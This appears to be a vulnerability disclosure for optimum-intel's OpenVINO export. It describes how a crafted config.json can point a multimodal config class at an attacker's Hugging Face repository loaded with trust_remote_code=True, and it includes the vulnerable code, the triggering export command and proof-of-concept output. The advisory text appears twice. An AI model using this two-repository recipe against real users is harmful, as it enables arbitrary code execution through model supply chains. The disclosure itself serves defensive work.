Description
There is a remote code execution vulnerability in optimum-intel during OpenVINO export of multimodal models. The issue is in LlavaQwen2OpenVINOConfig and Phi3VisionOpenVINOConfig, which unconditionally call AutoConfig.from_pretrained(..., trust_remote_code=True) on the repository specified by config.mm_vision_tower and config.img_processor["model_name"].
At first glance this may look acceptable because the real llava-qwen2/phi3_v architecture normally requires custom remote code. However, this assumption is unsafe. Take LlavaQwen2OpenVINOConfig as an example, an attacker can publish a seemingly normal model repository, set export_model_type to llava-qwen2, and control the mm_vision_tower field in config.json so that it points to an attacker-controlled backend repository. When a user runs the normal OpenVINO export command, optimum-intel initializes LlavaQwen2OpenVINOConfig, fetches the attacker-controlled backend config with trust_remote_code=True, and executes remote code.
This creates a stealthy two-repository attack. The frontend repository can look benign and contain only a crafted config.json, while the actual malicious code is stored in a separate backend repository. As a result, the attack can mislead users and bypass existing security checks that focus only on the frontend repo.
This issue can be triggered through the standard optimum-cli export openvino workflow. That makes the attack practical for normal users who are simply trying to convert a model, without realizing that the export step itself can execute attacker-controlled code.
Root Cause
The vulnerable code is:
|
self._behavior = behavior |
|
self._orig_config = config |
|
if self._behavior == VLMConfigBehavior.VISION_EMBEDDINGS: |
|
config = AutoConfig.from_pretrained(config.mm_vision_tower, trust_remote_code=True) |
|
if hasattr(config, "vision_config"): |
|
config = config.vision_config |
and
|
if self._behavior == Phi3VisionConfigBehavior.VISION_EMBEDDINGS and hasattr(config, "img_processor"): |
|
self._config = AutoConfig.from_pretrained( |
|
config.img_processor["model_name"], trust_remote_code=True |
|
).vision_config |
|
self._normalized_config = self.NORMALIZED_CONFIG_CLASS(self._config) |
The export path also allows attacker-controlled models to reach this class:
if hasattr(model.config, "export_model_type"):
model_type = model.config.export_model_type
else:
model_type = model.config.model_type
submodel_paths = export_from_model(
model=model,
output=output,
task=task,
ov_config=ov_config,
stateful=stateful,
model_kwargs=model_kwargs,
custom_export_configs=custom_export_configs,
fn_get_submodels=fn_get_submodels,
preprocessors=preprocessors,
device=device,
trust_remote_code=trust_remote_code,
patch_16bit_model=patch_16bit,
**kwargs_shapes,
)
Proof of Concept
I created two Hugging Face repositories for demonstration.
The frontend repository, XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign, contains a crafted config.json:
{
"model_type": "llava",
"export_model_type": "llava-qwen2",
"mm_vision_tower": "XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil"
}
The backend repository, XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil, contains attacker-controlled code that will be loaded through AutoConfig.from_pretrained(..., trust_remote_code=True).
Then run the normal export command:
optimum-cli export openvino \
--model XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign \
--task image-text-to-text \
./tmpdir
During export, optimum-intel reads the frontend model config, sees export_model_type: "llava-qwen2", and initializes LlavaQwen2OpenVINOConfig. Inside that class, it executes:
AutoConfig.from_pretrained(config.mm_vision_tower, trust_remote_code=True)
Since mm_vision_tower points to the attacker-controlled backend repository, i.e., XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil, remote code from that repository is fetched and executed. This leads to arbitrary code execution on the victim host during the normal export workflow.
$ optimum-cli export openvino --model XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign --task image-text-to-text ./tmpdir
Execute Malicious Payload!!!
Execute Malicious Payload!!!
Execute Malicious Payload!!!
Description
There is a remote code execution vulnerability in
optimum-intelduring OpenVINO export of multimodal models. The issue is inLlavaQwen2OpenVINOConfigandPhi3VisionOpenVINOConfig, which unconditionally callAutoConfig.from_pretrained(..., trust_remote_code=True)on the repository specified byconfig.mm_vision_towerandconfig.img_processor["model_name"].At first glance this may look acceptable because the real
llava-qwen2/phi3_varchitecture normally requires custom remote code. However, this assumption is unsafe. TakeLlavaQwen2OpenVINOConfigas an example, an attacker can publish a seemingly normal model repository, setexport_model_typetollava-qwen2, and control themm_vision_towerfield inconfig.jsonso that it points to an attacker-controlled backend repository. When a user runs the normal OpenVINO export command,optimum-intelinitializesLlavaQwen2OpenVINOConfig, fetches the attacker-controlled backend config withtrust_remote_code=True, and executes remote code.This creates a stealthy two-repository attack. The frontend repository can look benign and contain only a crafted
config.json, while the actual malicious code is stored in a separate backend repository. As a result, the attack can mislead users and bypass existing security checks that focus only on the frontend repo.This issue can be triggered through the standard
optimum-cli export openvinoworkflow. That makes the attack practical for normal users who are simply trying to convert a model, without realizing that the export step itself can execute attacker-controlled code.Root Cause
The vulnerable code is:
optimum-intel/optimum/exporters/openvino/model_configs.py
Lines 2187 to 2192 in e17aa5a
and
optimum-intel/optimum/exporters/openvino/model_configs.py
Lines 3079 to 3083 in e17aa5a
The export path also allows attacker-controlled models to reach this class:
Proof of Concept
I created two Hugging Face repositories for demonstration.
The frontend repository,
XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign, contains a craftedconfig.json:{ "model_type": "llava", "export_model_type": "llava-qwen2", "mm_vision_tower": "XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil" }The backend repository,
XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil, contains attacker-controlled code that will be loaded throughAutoConfig.from_pretrained(..., trust_remote_code=True).Then run the normal export command:
optimum-cli export openvino \ --model XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign \ --task image-text-to-text \ ./tmpdirDuring export,
optimum-intelreads the frontend model config, seesexport_model_type: "llava-qwen2", and initializesLlavaQwen2OpenVINOConfig. Inside that class, it executes:Since
mm_vision_towerpoints to the attacker-controlled backend repository, i.e.,XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil, remote code from that repository is fetched and executed. This leads to arbitrary code execution on the victim host during the normal export workflow.